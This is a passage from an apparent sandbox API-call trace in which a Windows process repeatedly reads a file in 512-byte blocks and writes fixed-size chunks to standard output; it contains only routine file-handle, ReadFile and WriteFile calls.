hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] GetFileType (hFile=0x50) returned 0x1 [0133.670] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0133.670] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.670] GetFileType (hFile=0x50) returned 0x1 [0133.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.679] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.679] GetFileType (hFile=0x50) returned 0x1 [0133.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.679] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.679] GetFileType (hFile=0x50) returned 0x1 [0133.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.679] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.679] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.679] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.679] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.679] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] 
GetFileType (hFile=0x50) returned 0x1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] GetFileType (hFile=0x50) returned 0x1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] GetFileType (hFile=0x50) returned 0x1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] GetFileType (hFile=0x50) returned 0x1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] GetFileType (hFile=0x50) returned 0x1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] GetFileType (hFile=0x50) returned 0x1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 
[0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] GetFileType (hFile=0x50) returned 0x1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] GetFileType (hFile=0x50) returned 0x1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.681] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.681] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.681] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.681] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] GetFileType (hFile=0x50) returned 0x1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] GetFileType (hFile=0x50) returned 0x1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] GetFileType (hFile=0x50) returned 0x1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] GetFileType (hFile=0x50) returned 0x1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] GetFileType (hFile=0x50) returned 0x1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] GetFileType (hFile=0x50) returned 0x1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] GetFileType (hFile=0x50) returned 0x1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] GetFileType (hFile=0x50) returned 0x1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.682] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.683] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.683] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.683] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] GetFileType (hFile=0x50) returned 0x1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] GetFileType (hFile=0x50) returned 0x1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] GetFileType (hFile=0x50) returned 0x1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] GetFileType (hFile=0x50) returned 0x1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] GetFileType 
(hFile=0x50) returned 0x1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] GetFileType (hFile=0x50) returned 0x1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] GetFileType (hFile=0x50) returned 0x1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] GetFileType (hFile=0x50) returned 0x1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.684] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.684] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.684] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.684] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.684] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] GetFileType (hFile=0x50) returned 0x1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] GetFileType (hFile=0x50) returned 0x1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] GetFileType (hFile=0x50) returned 0x1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] GetFileType (hFile=0x50) returned 0x1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] GetFileType (hFile=0x50) returned 0x1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] GetFileType (hFile=0x50) returned 0x1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, 
lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] GetFileType (hFile=0x50) returned 0x1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] GetFileType (hFile=0x50) returned 0x1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.686] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.686] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.686] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.686] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] GetFileType (hFile=0x50) returned 0x1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] GetFileType (hFile=0x50) returned 0x1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] GetFileType (hFile=0x50) returned 0x1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 
[0133.686] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] GetFileType (hFile=0x50) returned 0x1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] GetFileType (hFile=0x50) returned 0x1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] GetFileType (hFile=0x50) returned 0x1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] GetFileType (hFile=0x50) returned 0x1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] GetFileType (hFile=0x50) returned 0x1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] WriteFile (in: hFile=0x50, 
lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.687] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.687] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.687] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.687] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] GetFileType (hFile=0x50) returned 0x1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] GetFileType (hFile=0x50) returned 0x1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] GetFileType (hFile=0x50) returned 0x1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] GetFileType (hFile=0x50) returned 0x1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.688] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0133.688] GetFileType (hFile=0x50) returned 0x1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] GetFileType (hFile=0x50) returned 0x1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] GetFileType (hFile=0x50) returned 0x1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] GetFileType (hFile=0x50) returned 0x1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.689] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.689] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.689] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.689] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, 
lpOverlapped=0x0) returned 1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] GetFileType (hFile=0x50) returned 0x1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] GetFileType (hFile=0x50) returned 0x1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] GetFileType (hFile=0x50) returned 0x1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] GetFileType (hFile=0x50) returned 0x1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] GetFileType (hFile=0x50) returned 0x1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] GetFileType (hFile=0x50) returned 0x1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] WriteFile (in: hFile=0x50, 